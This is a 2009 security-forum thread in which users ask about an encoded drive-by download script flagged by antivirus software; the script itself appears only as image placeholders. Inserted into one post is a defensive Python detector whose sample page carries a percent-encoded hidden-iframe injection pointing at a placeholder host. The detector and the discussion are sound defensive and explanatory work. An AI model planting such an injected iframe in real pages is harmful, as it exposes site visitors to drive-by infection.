A Drive-by Download Threat?

Discussion in 'malware problems & news' started by Neoing, May 6, 2009.

Thread Status:
Not open for further replies.
  1. Neoing

    Neoing Registered Member

    Joined:
    Mar 3, 2009
    Posts:
    10
    Hi Guys,

    I went into a site recently and got prompted by AVG that the site contains a link to an exploit site. I checked with AVG support and they also said that there is a piece of code which is malicious.

    The code is as follows:

    [image: exploit-code-encoded.jpg]

    Can anyone decode what this means and what threat it poses to users visiting the site?

    Many Thanks in advance!



    Note from LWM: This is what the above encoded text converts to when you decode it:

    [image: exploit-code-decoded.jpg]

    Note: avast! triggered just on the appearance of the text in the post. Avira also triggered when copying the text and pasting it into a webpage form, like a search box. These are weak signature detections, since as "text only" this is harmless. If you execute the Javascript of it, though (which you cannot do in a vBulletin forum, therefore you must manipulate it yourself outside the forum to run it), then yes, you could infect yourself.
     
    Last edited by a moderator: May 7, 2009
  2. innerpeace

    innerpeace Registered Member

    Joined:
    Jan 15, 2007
    Posts:
    2,095
    Location:
    Mountaineer Country
    I'm not sure what it does but when I searched for it, I got an alert from Avira.
    http://www.avira.com/en/threats/section/fulldetails/id_vir/4221/html_dldr.iframe.dp.html

    I think maybe Avira was picking it up because of the copy/paste I did. I would advise anyone not to copy and paste the above code without the adequate protection and knowledge.

    I'm still getting alerts so don't mess with this!

    Edit: Here was the location of the file Avira detected.
    C:\Sandbox\Owner\DefaultBox\user\current\Application Data\Mozilla\Firefox\Profiles\c3xl6613.default\formhistory.sqlite
     
    Last edited: May 7, 2009
  3. vlk

    vlk AV Expert

    Joined:
    Dec 26, 2002
    Posts:
    618
    What does the fact that Avast and Avira warn on these snippets have to do with these being "weak signature detections"?

    You're talking about two completely unrelated things.

    It's like on-access file scanning. Some AVs warn if you just open an infected EXE file (e.g. open the containing folder in Explorer), others only warn when you try to execute it. But the method of detection can be just arbitrary...


    Cheers
    Vlk
     
  4. Neoing

    Neoing Registered Member

    Joined:
    Mar 3, 2009
    Posts:
    10

    Seems that this threat is pretty threatening. I tested entering the site with NAV 2009 but it doesn't detect anything. I got my friends to enter the site as well with other AVs and there isn't any prompt either. If anyone wants the site, please PM me, as this site is a commercial site.

    I hope this will not affect the other users visiting the site. Any AVG users out there willing to give this site a try? PM me.

    Thanks.
     
  5. innerpeace

    innerpeace Registered Member

    Joined:
    Jan 15, 2007
    Posts:
    2,095
    Location:
    Mountaineer Country
    In an effort to learn, could either set of the above scripts be inserted into a simple web page in an attempt to infect a user?

    Are there any other ways a user can execute the script?
     
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Unfortunately, this is all too easy, since these exploits are sold as packages on hacking sites. Here is an old one, which uses the exact same code except for the URL to connect to the hacker's server:

    http://www.urs2.net/rsj/computing/tests/gpack

    So, it is evident that this exploit code has been in circulation for a while. In the current Radio stations exploit, the fact that the same code appears on all of the Watch pages suggests some type of code injection which targeted those specific pages on the server. The URL in the malicious javascript code no longer works.

    So, you could put this code in a web page on your server and those who view it without proper protection would be exploited.

    Note that because it is javascript code, controlling javascript in the browser nullifies the attack.

    ----
    rich
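A defender-side check, added here as an example and not code from the thread (the thread's snippet survives only as images): a Python script that statically decodes unescape() payloads found in a page and lists any hidden iframes they would inject, so a site owner can inspect injected pages like the Watch pages Rmus describes without executing the JavaScript. The sample page, its placeholder host example.invalid, and the function names are all constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample page (not the code from the thread): a percent-encoded
# document.write() that injects a 0x0, display:none iframe pointing at a
# placeholder host. This is the shape AV vendors label "HTML/Dldr.Iframe".
SAMPLE_PAGE = (
    "<html><body><h1>Watch page</h1>\n"
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F"
    "example.invalid%2Fin.cgi%22%20width%3D0%20height%3D0%20"
    "style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'));</script>\n"
    "</body></html>"
)

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)

def js_unescape(s):
    """Decode JavaScript unescape() input (%XX and %uXXXX) without running JS."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag it sees."""
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def is_hidden(attrs):
    """Zero-sized or CSS-hidden iframes are the usual drive-by indicator."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)

def find_hidden_iframes(html):
    """Return (src, where) for hidden iframes in the page text itself and in
    every statically decoded unescape() payload."""
    layers = [(html, "page")]
    layers += [(js_unescape(m.group(2)), "unescape()")
               for m in UNESCAPE_CALL.finditer(html)]
    found = []
    for text, where in layers:
        p = IframeCollector()
        p.feed(text)
        found += [(f.get("src", ""), where) for f in p.iframes if is_hidden(f)]
    return found

if __name__ == "__main__":
    for src, where in find_hidden_iframes(SAMPLE_PAGE):
        print(f"hidden iframe in {where}: {src}")
```

The decoder only handles the one-layer unescape() form; snippets that build the string at runtime (string concatenation, eval of a second encoded layer) need a JavaScript sandbox rather than a static pass.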
     
  7. innerpeace

    innerpeace Registered Member

    Joined:
    Jan 15, 2007
    Posts:
    2,095
    Location:
    Mountaineer Country
    Thanks for the explanation and link Rmus. What you wrote was easy to understand :thumb:.
     